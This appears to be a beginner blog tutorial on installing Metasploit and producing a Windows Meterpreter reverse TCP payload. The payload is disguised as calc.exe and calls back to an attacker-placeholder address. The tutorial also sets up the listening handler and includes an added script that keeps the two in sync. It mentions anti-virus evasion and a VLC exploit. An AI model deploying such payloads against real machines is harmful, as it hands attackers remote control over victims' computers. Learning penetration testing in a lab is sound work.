"metasploit"

Published: Mon 07 September 2020

Metasploit Beginner Quick Start

This article is for beginner pentesters who struggle to get their own Metasploit installation up and running. I have also noticed that some struggle when it comes to generating a payload or executing an exploit. This article covers the basics of working payload generation.

This article was written for an Ubuntu 18.04.4 LTS VPS (Virtual Private Server) running on DigitalOcean. The writer picked 4GB RAM with 80GB disk space, which costs about USD 20 per month. The guide in this article should apply to other Debian derivatives as well.

Once you are ready with your Debian/Ubuntu installation, execute the following command as root:

  • #apt -y update && apt -y upgrade

This step ensures you have an up-to-date installation.

Metasploit Installation

Download the Metasploit installer by running the following command:

  • #curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

Give the msfinstall file executable permission and run it from the directory where you downloaded the installer file:

  • #./msfinstall

Once the above step is done, initialize the database that Metasploit will use by running the following command as a non-root user:

  • msfdb init

Metasploit Examples

In this example, we are going to create a Windows Meterpreter reverse TCP payload and give it to our victim.

To generate the payload, run the following command:

  • #msfvenom -p windows/meterpreter_reverse_tcp LHOST=<ATTACKER_IP_ADDR> LPORT=<ATTACKER_PORT> -f exe > calc.exe

Then, on a separate terminal, launch msfconsole and enter the following commands:

  • msf5 > use windows/meterpreter_reverse_tcp
  • msf5 > set LHOST <ATTACKER_IP_ADDR>
  • msf5 > set LPORT <ATTACKER_PORT>
  • msf5 > run

The commands above, when followed step by step, generate a payload for you on the host. Now transfer the generated file to your own (test victim) machine, and on the host run the following commands step by step:

  • #msfconsole
  • msf5 > use exploit/multi/handler
  • msf5 > set PAYLOAD windows/meterpreter_reverse_tcp (this must match the payload you gave to msfvenom when generating the file)
  • msf5 > set LHOST <ATTACKER_IP_ADDR>
  • msf5 > set LPORT <ATTACKER_PORT>
  • msf5 > exploit

The handler now listens for the incoming connection. Go ahead and run the generated file on the victim (or your own test) computer and you should see the connection being made and a Meterpreter session opened.
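A mismatch between the payload given to msfvenom and the PAYLOAD set on the handler is the most common reason a session never appears. The shell script below is an added example, not code from the original article: it derives both the msfvenom command and a msfconsole resource script for the handler from one set of variables, validates LHOST and LPORT first, and only builds text (nothing is executed). The address 192.0.2.10, the port and the file names are constructed placeholders.

```shell
#!/bin/sh
# Added example: keep the msfvenom payload and the multi/handler settings in sync
# by generating both from the same variables. Nothing here runs msfvenom or
# msfconsole; the functions only build the command line and the resource script.

PAYLOAD="windows/meterpreter_reverse_tcp"   # must be identical on both sides
LHOST="${LHOST:-192.0.2.10}"                # constructed placeholder (RFC 5737 range)
LPORT="${LPORT:-4444}"                      # constructed placeholder port

# valid_ipv4 ADDR -> 0 if ADDR is a dotted quad with every octet in 0-255
valid_ipv4() {
  echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  for o in $(echo "$1" | tr '.' ' '); do
    [ "$o" -le 255 ] || return 1
  done
  return 0
}

# valid_port P -> 0 if P is an integer in 1-65535
valid_port() {
  echo "$1" | grep -Eq '^[0-9]+$' || return 1
  [ "$1" -ge 1 ] || return 1
  [ "$1" -le 65535 ] || return 1
  return 0
}

# venom_cmd -> prints the msfvenom command that matches the handler below
venom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o calc.exe\n' \
    "$PAYLOAD" "$LHOST" "$LPORT"
}

# handler_rc -> prints a msfconsole resource script for the listener
# (exploit -j keeps the handler running as a background job)
handler_rc() {
  printf 'use exploit/multi/handler\nset PAYLOAD %s\nset LHOST %s\nset LPORT %s\nexploit -j\n' \
    "$PAYLOAD" "$LHOST" "$LPORT"
}

# write_handler FILE -> validates the inputs, writes FILE, returns 0 on success
write_handler() {
  valid_ipv4 "$LHOST" || { echo "bad LHOST: $LHOST" >&2; return 1; }
  valid_port "$LPORT" || { echo "bad LPORT: $LPORT" >&2; return 1; }
  handler_rc > "$1"
}
```

After `write_handler handler.rc` succeeds, `msfconsole -q -r handler.rc` starts the listener with exactly the values that `venom_cmd` printed for the payload.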

Conclusion

Metasploit is a powerful tool. You can use it to generate state-of-the-art payloads and stagers that can avoid anti-virus detection. It also has an exploit section where you can use exploits against vulnerable software. For example, there is an exploit for MKV files targeting VLC player version 2.2.8, so you can install the vulnerable VLC player and try out the exploit yourself. Running an exploit is similar to the payload workflow above. If you get stuck, use show options and help to see what commands and options are available to you.